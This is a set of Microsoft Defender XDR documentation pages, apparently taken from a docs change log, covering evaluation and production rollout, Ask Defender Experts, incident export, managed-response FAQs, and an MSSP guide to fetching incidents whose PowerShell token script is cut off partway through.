-Defender for Identity doesn't require any other configuration. Just make sure to purchase the necessary licenses and install the sensor on all of your Active Directory domain controllers and Active Directory Federation Services (AD FS) servers.
-
-## Microsoft Defender for Office 365
-
-After successfully evaluating or piloting Defender for Office 365, it can be promoted to your entire production environment.
-
-1. Purchase and provision the necessary licenses and assign them to your production users.
-2. Rerun recommended baseline policy configurations (either Standard or Strict) against your production email domain or specific groups of users.
-3. Optionally create and configure any custom Defender for Office 365 policies against your production email domain or groups of users. However, remember that any assigned baseline policies will always take precedence over custom policies.
-4. Update the public MX record for your production email domain to resolve directly to EOP.
-5. Decommission any third-party SMTP gateways and disable or delete any EXO connectors associated with this relay.
-
-## Microsoft Defender for Endpoint
-
-To promote Microsoft Defender for Endpoint evaluation environment from a pilot to production, onboard more endpoints to the service using any of the [supported tools and methods](../defender-endpoint/onboard-configure.md).
-
-Use the following general guidelines to onboard more devices to Microsoft Defender for Endpoint.
-
-1. Verify that the device fulfills the [minimum requirements](../defender-endpoint/minimum-requirements.md).
-2. Depending on the device, follow the configuration steps provided in the onboarding section of the Defender for Endpoint portal.
-3. Use the appropriate management tool and deployment method for your devices.
-4. Run a detection test to verify that the devices are properly onboarded and reporting to the service.
-
-## Microsoft Defender for Cloud Apps
-
-Microsoft Defender for Cloud Apps doesn't require any other configuration. Just make sure to purchase the necessary licenses. If you've scoped the deployment to certain user groups, increase the scope of these groups until you reach production scale.
-
security Eval Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-overview.md
- Title: Evaluate and pilot Microsoft Defender XDR security, an XDR solution that unifies threat data so you can take action.
-description: What is XDR security? How can you evaluate a Microsoft XDR in Microsoft Defender XDR? Use this blog series to plan your Microsoft Defender XDR trial lab or pilot environment and test and pilot a security solution designed to protect devices, identity, data, and applications. Take that XDR seccurity test to production.
-
- - NOCSH
-- Previously updated : 02/26/2024--
- - m365-security
- - m365solution-overview
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Evaluate and pilot Microsoft Defender XDR security
-
-**Applies to:**
--- Microsoft Defender XDR-
-## How this article series works
-
-This series is designed to step you through the entire process of setting up a trial XDR environment, *end-to-end*, so you can evaluate the features and capabilities of Microsoft Defender XDR and even promote the evaluation environment straight to production when you're ready.
-
-If you're new to thinking about XDR security, you can scan the 7 linked articles in this series to get a feel for how comprehensive the solution is.
--- [How to create the environment](eval-create-eval-environment.md)-- Set up or learn about each technology of this Microsoft XDR
- - [Microsoft Defender for Identity](eval-defender-identity-overview.md)
- - [Microsoft Defender for Office](eval-defender-office-365-overview.md)
- - [Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
- - [Microsoft Defender for Cloud Apps](eval-defender-mcas-overview.md)
-- [How to investigate and respond using this XDR](eval-defender-investigate-respond.md)-- [Promote the trial environment to production](eval-defender-promote-to-production.md)-
-<a name='microsoft-365-defender-is-a-microsoft-xdr-cyber-security-solution'></a>
-
-## What is XDR and Microsoft Defender XDR?
-
-XDR security is a step forward in cyber security because it takes the threat data from systems that were once isolated and unifies them so that you can see patterns and act on them faster.
-
-For example, Microsoft XDR unifies endpoint (endpoint detection and response or EDR), email, app, and identity security in one place.
-
-Microsoft Defender XDR is an **eXtended detection and response (XDR) solution** that automatically collects, correlates, and analyzes signal, threat, and alert data from *across* your Microsoft 365 environment, including *endpoint, email, applications, and identities*. It leverages **artificial intelligence (AI) and automation to *automatically* stop attacks**, and remediate affected assets to a safe state.
-
-<a name='microsoft-recommendations-for-evaluating-microsoft-365-defender'></a>
-
-## Microsoft recommendations for evaluating Microsoft Defender XDR security
-
-Microsoft recommends you create your evaluation in an existing production subscription of Office 365. This way you will gain real-world insights immediately and can tune settings to work against current threats in your environment. After you've gained experience and are comfortable with the platform, simply promote each component, one at a time, to production.
-
-## The anatomy of a cyber security attack
-
-Microsoft Defender XDR is a Cloud-based, unified, pre- and post-breach enterprise defense suite. It coordinates *prevention*, *detection*, *investigation*, and *response* across endpoints, identities, apps, email, collaborative applications, and all of their data.
-
-In this illustration an attack is underway. Phishing email arrives at the Inbox of an employee in your organization, who unknowingly opens the email attachment. This installs malware, which leads to a chain of events that could end with the theft of sensitive data. But in this case, Defender for Office 365 is in operation.
--
-In the illustration:
--- **Exchange Online Protection**, part of Microsoft Defender for Office 365, can detect the phishing email and use mail flow rules (also known as transport rules) to make certain it never arrives in the Inbox.-- **Defender for Office 365** uses Safe Attachments to test the attachment and determine that it's harmful, so the mail that arrives either isn't actionable by the user, or policies prevent the mail from arriving at all.-- **Defender for Endpoint** manages devices that connect to the corporate network and detect device and network vulnerabilities that might otherwise be exploited.-- **Defender for Identity** takes note of sudden account changes like privilege escalation, or high-risk lateral movement. It also reports on easily exploited identity issues like unconstrained Kerberos delegation, for correction by the security team.-- **Microsoft Defender for Cloud Apps** notices anomalous behavior like impossible-travel, credential access, and unusual download, file share, or mail forwarding activity and reports these to the security team.-
-<a name='microsoft-365-defender-components-secure-devices-identity-data-and-applications'></a>
-
-### Microsoft Defender XDR components secure devices, identity, data, and applications
-
-Microsoft Defender XDR is made up of these security technologies, operating in tandem. You don't need all of these components to benefit from the capabilities of XDR and Microsoft Defender XDR. You will realize gains and efficiencies through using one or two as well.
-
-|Component|Description|Reference material|
-||||
-|Microsoft Defender for Identity|Microsoft Defender for Identity uses Active Directory signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization.|[What is Microsoft Defender for Identity?](/defender-for-identity/what-is)|
-|Exchange Online Protection|Exchange Online Protection is the native cloud-based SMTP relay and filtering service that helps protect your organization against spam and malware.|[Exchange Online Protection (EOP) overview - Office 365](../office-365-security/eop-about.md)|
-|Microsoft Defender for Office 365|Microsoft Defender for Office 365 safeguards your organization against malicious threats posed by email messages, links (URLs) and collaboration tools.|[Microsoft Defender for Office 365 - Office 365](/microsoft-365/security/office-365-security/defender-for-office-365-whats-new)|
-|Microsoft Defender for Endpoint|Microsoft Defender for Endpoint is a unified platform for device protection, post-breach detection, automated investigation, and recommended response.|[Microsoft Defender for Endpoint - Windows security](../defender-endpoint/microsoft-defender-endpoint.md)|
-|Microsoft Defender for Cloud Apps|Microsoft Defender for Cloud Apps is a comprehensive cross-SaaS solution bringing deep visibility, strong data controls, and enhanced threat protection to your cloud apps.|[What is Defender for Cloud Apps?](/cloud-app-security/what-is-cloud-app-security)|
-|Microsoft Entra ID Protection|Microsoft Entra ID Protection evaluates risk data from billions of sign-in attempts and uses this data to evaluate the risk of each sign-in to your environment. This data is used by Microsoft Entra ID to allow or prevent account access, depending on how Conditional Access policies are configured. Microsoft Entra ID Protection is licensed separately from Microsoft Defender XDR. It is included with Microsoft Entra ID P2.|[What is Identity Protection?](/azure/active-directory/identity-protection/overview-identity-protection)|
-
-<a name='microsoft-365-defender-architecture'></a>
-
-## Microsoft Defender XDR architecture
-
-The diagram below illustrates high-level architecture for key Microsoft Defender XDR components and integrations. *Detailed* architecture for each Defender component, and use-case scenarios, are given throughout this series of articles.
--
-In this illustration:
--- Microsoft Defender XDR combines the signals from all of the Defender components to provide extended detection and response (XDR) across domains. This includes a unified incident queue, automated response to stop attacks, self-healing (for compromised devices, user identities, and mailboxes), cross-threat hunting, and threat analytics.-- Microsoft Defender for Office 365 safeguards your organization against malicious threats posed by email messages, links (URLs), and collaboration tools. It shares signals resulting from these activities with Microsoft Defender XDR. Exchange Online Protection (EOP) is integrated to provide end-to-end protection for incoming email and attachments.-- Microsoft Defender for Identity gathers signals from servers running Active Directory Federated Services (AD FS) and on-premises Active Directory Domain Services (AD DS). It uses these signals to protect your hybrid identity environment, including protecting against hackers that use compromised accounts to move laterally across workstations in the on-premises environment.-- Microsoft Defender for Endpoint gathers signals from and protects devices used by your organization.-- Microsoft Defender for Cloud Apps gathers signals from your organization's use of cloud apps and protects data flowing between your environment and these apps, including both sanctioned and unsanctioned cloud apps.-- Microsoft Entra ID Protection evaluates risk data from billions of sign-in attempts and uses this data to evaluate the risk of each sign-in to your environment. This data is used by Microsoft Entra ID to allow or prevent account access, depending on how Conditional Access policies are configured. Microsoft Entra ID Protection is licensed separately from Microsoft Defender XDR. It is included with Microsoft Entra ID P2.-
-<a name='microsoft-siem-and-soar-can-use-data-from-microsoft-365-defender'></a>
-
-## Microsoft SIEM and SOAR can use data from Microsoft Defender XDR
-
-Additional optional architecture components not included in this illustration:
--- **Detailed signal data from all Microsoft Defender XDR components can be integrated into Microsoft Sentinel** and combined with other logging sources to offer full SIEM and SOAR capabilities and insights.-- **For more reading on using Microsoft Sentinel, an Azure SIEM, with Microsoft Defender XDR** as an XDR, take a look at this [Overview article](/azure/sentinel/microsoft-365-defender-sentinel-integration) and the Microsoft Sentinel and Microsoft Defender XDR [integration steps](/azure/sentinel/connect-microsoft-365-defender?tabs=MDE).-- For more on SOAR in Microsoft Sentinel (including links to playbooks in the Microsoft Sentinel GitHub Repository), please read [this article](/azure/sentinel/automate-responses-with-playbooks).-
-<a name='the-evaluation-process-for-microsoft-365-defender-cyber-security'></a>
-
-## The evaluation process for Microsoft Defender XDR cyber security
-
-Microsoft recommends enabling the components of Microsoft 365 in the order illustrated:
--
-The following table describes this illustration.
-
-|Serial Number|Step|Description|
-||||
-|1|[Create the evaluation environment](eval-create-eval-environment.md)|This step ensures you have the trial license for Microsoft Defender XDR.|
-|2|[Enable Defender for Identity](eval-defender-identity-overview.md)|Review the architecture requirements, enable the evaluation, and walk through tutorials for identifying and remediating different attack types.|
-|3|[Enable Defender for Office 365](eval-defender-office-365-overview.md)|Ensure you meet the architecture requirements, enable the evaluation, and then create the pilot environment. This component includes Exchange Online Protection and so you will actually evaluate *both* here.|
-|4|[Enable Defender for Endpoint](eval-defender-endpoint-overview.md)|Ensure you meet the architecture requirements, enable the evaluation, and then create the pilot environment.|
-|5|[Enable Microsoft Defender for Cloud Apps](eval-defender-mcas-overview.md)|Ensure you meet the architecture requirements, enable the evaluation, and then create the pilot environment.|
-|6|[Investigate and respond to threats](eval-defender-investigate-respond.md)|Simulate an attack and begin using incident response capabilities.|
-|7|[Promote the trial to production](eval-defender-promote-to-production.md)|Promote the Microsoft 365 components to production one-by-one.|
-
-This order is commonly recommended and designed to leverage the value of the capabilities quickly based on how much effort is typically required to deploy and configure the capabilities. For example, Defender for Office 365 can be configured in less time than it takes to enroll devices in Defender for Endpoint. Of course, you should prioritize the components to meet your business needs, and can enable these in a different order.
-
-## Go to the Next Step
-
-[Learn about and/or create the Microsoft Defender XDR Evaluation Environment](eval-create-eval-environment.md)
security Experts On Demand https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/experts-on-demand.md
- Title: Collaborate with Experts on Demand using Ask Defender Experts-
-description: Select Ask Defender Experts directly inside the Microsoft Defender security portal to get swift and accurate responses to all your threat hunting questions.
-search.product: Windows 10
-
-ms.sitesec: library
-ms.pagetype: security
----
- - m365-security
- - tier1
- - essentials-get-started
- Previously updated : 04/18/2024--
-# Collaborate with experts on demand
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> Ask Defender Experts is included in your Defender Experts for Hunting subscription with [monthly allocations](/microsoft-365/security/defender/before-you-begin-defender-experts#eligibility-and-licensing). However, it's not a security incident response service. It's intended to provide a better understanding of complex threats affecting your organization. Engage with your own security incident response team to address urgent security incident response issues. If you don't have your own security incident response team and would like Microsoft's help, create a support request in the [Premier Services Hub](/services-hub/).
-
-Select **Ask Defender Experts** directly inside the Microsoft 365 security portal to get swift and accurate responses to all your threat hunting questions. Experts can provide insight to better understand the complex threats your organization might face. Ask Defender Experts can help:
--- Gather additional information on alerts and incidents, including root causes and scope-- Gain clarity into suspicious devices, alerts, or incidents and take next steps if faced with an advanced attacker-- Determine risks and available protections related to threat actors, campaigns, or emerging attacker techniques-
-### Required permissions for submitting inquiries in the Ask Defender Experts panel
-
-You need to select one of the following permissions before submitting inquires to our Defender experts. For more details about role-based access control (RBAC) permissions, see: [Microsoft Defender for Endpoint and Microsoft Defender XDR RBAC permissions](/microsoft-365/security/defender/compare-rbac-roles#map-defender-for-endpoint-and-defender-vulnerability-management-permissions-to-the-microsoft-defender-xdr-rbac-permissions).
-
-|**Product name**|**Product RBAC permission**|
-||||
-| Microsoft Defender for Endpoint RBAC | Manage security settings in the Security Center|
-| Microsoft Defender XDR Unified RBAC | Authorization and settings \ Security settings \ Core security settings (manage)</br>Authorization and settings \ Security settings \ Detection tuning (manage) |
-
-### Where to find Ask Defender Experts
-
-The option to **Ask Defender Experts** is available in several places throughout the portal:
--- **Device page actions menu**---- **Device inventory page flyout menu**---- **Alerts page flyout menu**---- **Incidents page actions menu**--
-### Sample questions you can ask from Defender Experts
-
-**Alert information**
--- We saw a new type of alert for a living-off-the-land binary. We can provide the alert ID. Can you tell us more about this alert and if it's related to any incident and how we can investigate it further?-- We've observed two similar attacks, which both try to execute malicious PowerShell scripts but generate different alerts. One is "Suspicious PowerShell command line" and the other is "A malicious file was detected based on indication provided by Office 365." What is the difference?-- We received an odd alert today about an abnormal number of failed logins from a high profile user's device. We can't find any further evidence for these attempts. How can Microsoft Defender XDR see these attempts? What type of logins are being monitored?-- Can you give more context or insight about the alert and any related incidents, "Suspicious behavior by a system utility was observed"?-- I observed an alert titled "Creation of forwarding/redirect rule". I believe the activity is benign. Can you tell me why I received an alert?-
-**Possible device compromise**
--- Can you help explain why we see a message or alert for "Unknown process observed" on many devices in our organization? We appreciate any input to clarify whether this message or alert is related to malicious activity or incidents.-- Can you help validate a possible compromise on the following system, dating from last week? It's behaving similarly as a previous malware detection on the same system six months ago.-
-**Threat intelligence details**
--- We detected a phishing email that delivered a malicious Word document to a user. The document caused a series of suspicious events, which triggered multiple alerts for a particular malware family. Do you have any information on this malware? If yes, can you send us a link?-- We recently saw a blog post about a threat that is targeting our industry. Can you help us understand what protection Microsoft Defender XDR provides against this threat actor?-- We recently observed a phishing campaign conducted against our organization. Can you tell us if this was targeted specifically to our company or vertical?-
-**Microsoft Defender Experts for Hunting alert communications**
--- Can your incident response team help us address the Defender Experts Notification that we got?-- We received this Defender Experts Notification from Microsoft Defender Experts for Hunting. We don't have our own incident response team. What can we do now, and how can we contain the incident?-- We received a Defender Experts Notification from Microsoft Defender Experts for Hunting. What data can you provide to us that we can pass on to our incident response team?-
-### Next step
--- [Understand the Defender Experts for Hunting report in Microsoft Defender XDR](defender-experts-report.md)
security Export Incidents Queue https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/export-incidents-queue.md
- Title: Export incidents queue to CSV files
-description: Learn about the newly introduced Export button to migrate incidents queue-related data to CSV files
-
- - NOCSH
----
- - m365-security
- - m365initiative-m365-defender
- - tier3
--
- - MOE150
- - MET150
Previously updated : 07/11/2022--
-# Export incidents queue to CSV files
---
-**Applies to:**
-- Microsoft Defender XDR-
-The **Export** feature allows you to export the data in the incident queue that is displayed according to the applied filters and time ranges. It's available in the form of a button named **Export**, as displayed in the following screenshot:
--
-When you click the **Export** button, the data is exported to a CSV file. You can apply various filters and time ranges to the incidents queue (not just in the context of exporting the data, but in a generic context). When you select **Export**, whichever filters and/or time ranges are applied to the incidents queue, such data is exported to the CSV file.
-
-Once you export the incidents queue-related data onto the CSV file, you can analyze the data and filter it further, based on your requirements.
-
-For example, for the data on the CSV file, you can apply filters to view the following data:
-- Data regarding how many high-severity incidents you had in the last 30 days.-- Data regarding who is your most productive analyst.-
-> [!NOTE]
-> The maximum number of records you can export to a CSV file is 10,000.
-
-If you have thoughts or suggestions about the new **Export** feature (the **Export** button) for the incident queue, contact Microsoft team or send your feedback through the Microsoft Defender portal.
security Faq Incident Notifications Xdr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/faq-incident-notifications-xdr.md
- Title: FAQs related to Microsoft Defender Experts for XDR incident notifications-
-description: Frequently asked questions related to Defender Experts for XDR incident notifications
------
- - m365-security
- - tier1
- Previously updated : 08/29/2023--
-# Understanding and managing Defender Experts for XDR incident updates
-
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-
-The following section lists down questions your SOC team might have regarding the receipt of [incident notifications](managed-detection-and-response-xdr.md#incident-updates).
-
-<a name='in-microsoft-365-defender-portal-and-graph-security-api'></a>
-
-## In Microsoft Defender portal and Graph Security API
-
-| Questions | Answers |
-|||
-| **How do I know whether a Defender Experts analyst has started working on an incident?** | When a Defender Experts analyst starts working on an incident, the incident's **Assigned to** field is updated to _Defender Experts_.|
-| **How do I know whether a Defender Experts analyst has resolved an incident?** | When a Defender Experts analyst has resolved an incident, the incident's **Status** field is updated to _Resolved_. |
-| **How do I know what conclusion led a Defender Experts analyst to resolve an incident?** | When Defender Experts analysts resolve an incident, they modify the incident's **Classification** and **Determination** fields and provide a concise summary in its **Comments** section.<br><br>If an incident is classified as a True Positive, a comprehensive **Investigation summary** appears in the **Managed response** flyout panel in your Microsoft Defender portal.|
-| **How do I know what actions a Defender Experts analyst took in my tenant when investigating an incident?** | For each incident they investigate, the Defender Experts analyst summarizes any actions they performed within your tenant in the incident's **Investigation summary** located in the **Managed response** flyout panel in your Microsoft Defender portal.<br><br>You can also retrieve information about these actions, and the times they signed into your tenant, by [searching your audit logs](/microsoft-365/security/defender/auditing#create-a-rule-for-email-notifications) either on the Microsoft Purview compliance portal or through the Office 365 Management Activity API.|
-| **How do I know whether a Defender Experts analyst has sent any response actions for my SOC team?** | The Defender Experts analyst publishes the response actions they recommend your SOC team to perform on an incident in an incident's **Managed response** flyout panel in your Microsoft Defender portal.<br><br>At this time, the incident's **Assigned to** field is updated to _Customer_ and its **Status** is updated to _Awaiting Customer Action_.<br><br>Your incident contacts, which you have [designated](/microsoft-365/security/defender/get-started-xdr#tell-us-who-to-contact-for-important-matters) in **Settings** > **Defender Experts** > **Notification contacts** in your Microsoft Defender portal, also receive a corresponding email notification if there are response actions requiring your attention. |
-| **How do I ask a Defender Experts analyst questions about an investigation or response action?** | After a Defender Experts analyst publishes their investigation summary and recommended response actions in the **Managed response** flyout panel of a True Positive incident, you can use the **Chat** tab in the same panel to ask the Defender Experts team questions about the incident and their investigation.<br><br>Alternatively, your designated incident contacts can directly respond to the email they received from Defender Experts to ask any questions you might have.|
-| **How do I know which incidents have pending response actions?** | The Defender Experts card in your Microsoft Defender portal home page includes a link that displays a message (for example, _3 incidents awaiting your action_). Selecting this link directs you to a filtered list of incidents specifically requiring your attention.<br><br>You can filter the incident queue in your Microsoft Defender portal by selecting **Assigned to** as _Customer_ or **Status** as _Awaiting Customer Action_.|
-
-## In Microsoft Sentinel
-
-| Questions | Answers |
-|||
-| **How do I get Defender Experts updates in Sentinel?** | If you have enabled the data connector between Microsoft Defender XDR and Microsoft Sentinel, updates made by Defender Experts in Defender to incidents are synchronized with Microsoft Sentinel. [Learn more](/azure/sentinel/connect-microsoft-365-defender).<br><br>The **Assigned to**, **Status**, and **Classification** fields in Microsoft Defender XDR incidents are mapped to the corresponding fields in Sentinel, namely **Owner**, **Status**, and **Reason for closing**.|
-| **How do I get Defender Experts updates in Sentinel to automatically trigger a playbook?** | To get Defender Experts updates, first, set up automation rules in Sentinel that are triggered with the following Defender Experts updates:<ul><li>When the **Owner** field in Microsoft Sentinel is updated to _Defender Experts_ or _Customer_.</li><li> When the **Status** field in Microsoft Sentinel is updated to _Active_ or _Closed_, which corresponds to Microsoft Defender XDR **Status** _Active_ and _In Progress_ respectively.</li><li>When Sentinel **Tag** _Awaiting Customer Action_ gets added, which corresponds to Microsoft Defender XDR **Status** _Awaiting Customer Action_.</li></ul>Next, set up playbooks in Microsoft Sentinel to automatically sync incident updates or [send incident notifications into other apps](/azure/sentinel/tutorial-respond-threats-playbook).<ul><li>Send email, or Teams message, or Slack message to your SOC team when a Defender Experts analyst is assigned to an incident.</li><li>Send SMS or phone call via Azure Communications Services or Twilio connector to your SOC lead when Defender Experts publishes response action for your team.</li><li>Create a task or ticket in apps such as Azure DevOps, ServiceNow, Jira, ZenDesk, FreshService, PagerDuty, etc. for your IT Ops team. </li></ul>|
-| **How can I access managed response actions published by Defender Experts from Sentinel?** | Once Defender Experts publish managed response actions for an incident in your Microsoft Defender portal, the **Owner** field is updated to _Customer_ automatically, and the tag _Awaiting Customer Action_ is available in Sentinel. You can use these field changes as a trigger to review the managed response panel for the corresponding incident in the Microsoft Defender portal.|
-
-## In third-party SIEM, SOAR, or ITSM apps
-
-| Questions | Answers |
-|||
-| **How do I get Defender Experts updates from Microsoft Defender XDR to sync into third-party security information and event management (SIEM), security orchestration, automation and response (SOAR), or IT service management (ITSM) apps?** | You can get Defender Experts updates from Microsoft Defender XDR through the _Graph Security API_ ([_microsoft.graph.security.incident_](/graph/api/resources/security-incident)).<br></br>To initiate the synchronization process:<ol><li>Establish the mapping between fields in Microsoft Defender XDR and the corresponding fields in the desired application. Determine whether the sync should be uni- or bi-directional and ensure that the other application supports that. <li>Develop, test, and deploy your sync integration. In most cases, it's recommended to periodically poll the Graph Security API every minute or so to check for updates.<li>Periodically validate that the field mapping is up to date.</ol>|
-| **Can I sync managed response actions published by Defender Experts in Microsoft Defender portal to third-party SIEM, SOAR, or ITSM apps?** | Once Defender Experts publish managed response actions for an incident in your Microsoft Defender portal, the **Assigned to** field is changed to _Customer_ and the **Status** field is updated to _Awaiting Customer Action_. You can sync these fields via the Graph Security API and then use these changes as a trigger to review the managed response actions in the Microsoft Defender portal.<br><br>Managed response actions are expected to be available in the Graph Security API later this year, at which time it will be possible to sync them with your third-party apps.|
-
-## In other communication services
-
-| Questions | Answers |
-|||
-| **Can I get Defender Experts updates from Microsoft Defender XDR in email?** | Once a Defender Experts analyst publishes recommended response actions to an incident, your designated incident contacts will receive a corresponding email notification to the email addresses specified in **Settings** > **Defender Experts** > **Notification contacts** in your Microsoft Defender portal.<br><br>Additionally, you can [configure a Logic App](/connectors/connector-reference/connector-reference-logicapps-connectors) to send all incident updates to your designated email address(es) automatically.|
-| **Can I get Defender Experts updates from Microsoft Defender XDR in Microsoft Teams?** | A two-way chat functionality is accessible through an incident's **Managed response** flyout panel in your Microsoft Defender portal.<br><br>Additionally, you can [configure a Logic App](/connectors/connector-reference/connector-reference-logicapps-connectors) to send all incident updates to your designated email address(es) automatically.|
-| **Can I get Defender Experts updates from Microsoft Defender XDR as SMS or phone call updates, or in third-party communications services such as Slack?** | You can [configure a Logic App](/connectors/connector-reference/connector-reference-logicapps-connectors) to do this to send notifications from communication services such as Slack, Twilio, Azure Communication Services, etc.|
-
-### See also
-
-[Managed detection and response](managed-detection-and-response-xdr.md)
-
security Faq Managed Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/faq-managed-response.md
- Title: FAQs related to Microsoft Defender Experts for XDR Managed response-
-description: Frequently asked questions related to managed response notifications
------
- - m365-security
- - tier1
- Previously updated : 01/30/2024--
-# Understanding Managed response
-
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-
-The following section lists down questions you or your SOC team might have regarding [Managed response](managed-detection-and-response-xdr.md).
-
-| Questions | Answers |
-|||
-|**What is Managed response?** | Microsoft Defender Experts for XDR offers **Managed response** where our experts manage the entire remediation process for incidents that require them. This process includes investigating the incident to identify the root cause, determining the required response actions, and taking those actions on your behalf.|
-|**What actions are in scope for Managed response?** | All actions found below are in scope for Managed response for any device and user that isn't excluded.<br><br>*For devices* *(Available now)*<ul><li>Isolate machine<br><li>Release machine from isolation<br><li>Stop and quarantine file<br><li>Restrict app execution<br><li>Remove app restriction</ul><br>*For users (Coming soon)*<ul><li>Force password reset<br><li>Disable user<br><li>Enable user<br><li>Soft delete emails </ul> |
-|**Can I customize the extent of Managed response?** | You can configure the extent to which our experts do Managed response actions on your behalf by excluding certain devices and users (individually or by groups) either during onboarding or later by modifying your service's settings. [Read more about excluding device groups](../defender/get-started-xdr.md#exclude-devices-from-remediation) |
-|**What support do Defender Experts offer for excluded assets?** | If our experts determine that you need to perform response actions on excluded devices or users, we notify you through various customizable methods and direct you to your Microsoft Defender XDR portal. From your portal, you can then view a detailed summary of our investigation process and the required response actions in the portal and perform these required actions directly. Similar capabilities are also available through Defender APIs, in case you prefer using a security information and event management (SIEM), IT service management (ITSM), or any other third-party tool. |
-|**How am I going to be informed about the response actions?** | Response actions that our experts have completed on your behalf and any pending ones that you need to perform on your excluded assets are displayed in the **Managed response** panel in your Defender portal's **Incidents** page. <br><br>In addition, you'll also receive an email containing a link to the incident and instructions to view the Managed response in the portal. Moreover, if you have integration with Microsoft Sentinel or APIs, you'll also be notified within those tools by looking for Defender Experts statuses. For more information, see [FAQs related to Microsoft Defender Experts for XDR incident notifications](../defender/faq-incident-notifications-xdr.md).|
-|**Can I customize Managed response based on actions?** | No. If you have devices or users that are considered high-value or sensitive, you can add them to your exclusion list. Our experts will NOT take any action on them and will only provide guidance if they're impacted by an incident.|
-
-### See also
--- [Managed detection and response](managed-detection-and-response-xdr.md)-- [FAQs related to Microsoft Defender Experts for XDR incident notifications](../defender/faq-incident-notifications-xdr.md)-
security Feedback https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/feedback.md
- Title: Provide feedback on Microsoft Defender XDR
-description: Provide product feedback on Microsoft Defender XDR.
-
- - NOCSH
------ m365-security-- tier3-
- - MOE150
- - MET150
Previously updated : 02/16/2021--
-# Provide feedback on Microsoft Defender XDR
---
-**Applies to:**
-- Microsoft Defender XDR-
-Your feedback helps us get better in protecting your environment from advanced attacks. Share your experience, impressions, and requests by providing feedback.
-
-Check out this video to see how to provide feedback.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4LWeP]
--
-1. From any part of the Microsoft Defender portal, select **Give feedback**.
-
- :::image type="content" source="../../media/feedback.png" alt-text="The incidents in the Microsoft 365 security portal" lightbox="../../media/feedback.png":::
-
-2. Rate your experience and provide details on what you liked or where improvement can be made. You can also choose to be contacted about the feedback.
-
-3. Select **Submit**.
-
security Fetch Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/fetch-incidents.md
- Title: Fetch Microsoft Defender XDR incidents
-description: Learn how to fetch Microsoft Defender XDR incidents from a customer tenant
------- m65-security-compliance-- tier3-- must-keep-- Previously updated : 10/25/2021--
-# Fetch Microsoft Defender XDR incidents
--
-**Applies to:**
-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> **Try our new APIs using MS Graph security API**. Find out more at: [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview).
-
-> [!NOTE]
-> This action is taken by the MSSP.
-
-There are two ways you can fetch alerts:
--- Using the SIEM method-- Using APIs-
-## Fetch incidents into your SIEM
-
-To fetch incidents into your SIEM system, you'll need to take the following steps:
--- Step 1: Create a third-party application-- Step 2: Get access and refresh tokens from your customer's tenant-- Step 3: allow your application on Microsoft Defender XDR-
-<a name='step-1-create-an-application-in-azure-active-directory-azure-ad'></a>
-
-### Step 1: Create an application in Microsoft Entra ID
-
-You'll need to create an application and grant it permissions to fetch alerts from your customer's Microsoft Defender XDR tenant.
-
-1. Sign in to the [Microsoft Entra admin center](https://aad.portal.azure.com/).
-
-2. Select **Microsoft Entra ID** \> **App registrations**.
-
-3. Click **New registration**.
-
-4. Specify the following values:
-
- - Name: \<Tenant_name\> SIEM MSSP Connector (replace Tenant_name with the tenant display name)
-
- - Supported account types: Account in this organizational directory only
- - Redirect URI: Select Web and type `https://<domain_name>/SiemMsspConnector`(replace <domain_name> with the tenant name)
-
-5. Click **Register**. The application is displayed in the list of applications you own.
-
-6. Select the application, then click **Overview**.
-
-7. Copy the value from the **Application (client) ID** field to a safe place, you will need this in the next step.
-
-8. Select **Certificate & secrets** in the new application panel.
-
-9. Click **New client secret**.
-
- - Description: Enter a description for the key.
- - Expires: Select **In 1 year**
-
-10. Click **Add**, copy the value of the client secret to a safe place, you will need this in the next step.
-
-### Step 2: Get access and refresh tokens from your customer's tenant
-
-This section guides you on how to use a PowerShell script to get the tokens from your customer's tenant. This script uses the application from the previous step to get the access and refresh tokens using the OAuth Authorization Code Flow.
-
-After providing your credentials, you'll need to grant consent to the application so that the application is provisioned in the customer's tenant.
-
-1. Create a new folder and name it: `MsspTokensAcquisition`.
-
-2. Download the [LoginBrowser.psm1 module](https://github.com/shawntabrizi/Microsoft-Authentication-with-PowerShell-and-MSAL/blob/master/Authorization%20Code%20Grant%20Flow/LoginBrowser.psm1) and save it in the `MsspTokensAcquisition` folder.
-
- > [!NOTE]
- > In line 30, replace `authorzationUrl` with `authorizationUrl`.
-
-3. Create a file with the following content and save it with the name `MsspTokensAcquisition.ps1` in the folder:
-
- ```powershell
- param (
- [Parameter(Mandatory=$true)][string]$clientId,
- [Parameter(Mandatory=$true)][string]$secret,
- [Parameter(Mandatory=$true)][string]$tenantId
- )
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-
- # Load our Login Browser Function
- Import-Module .\LoginBrowser.psm1
-
- # Configuration parameters
- $login = "https://login.microsoftonline.com"
- $redirectUri = "https://SiemMsspConnector"
- $resourceId = "https://graph.windows.net"
-
- Write-Host 'Prompt the user for his credentials, to get an authorization code'
- $authorizationUrl = ("{0}/{1}/oauth2/authorize?prompt=select_account&response_type=code&client_id={2}&redirect_uri={3}&resource={4}" -f
- $login, $tenantId, $clientId, $redirectUri, $resourceId)
- Write-Host "authorzationUrl: $authorizationUrl"
-
- # Fake a proper endpoint for the Redirect URI
- $code = LoginBrowser $authorizationUrl $redirectUri
-
- # Acquire token using the authorization code
-
- $Body = @{
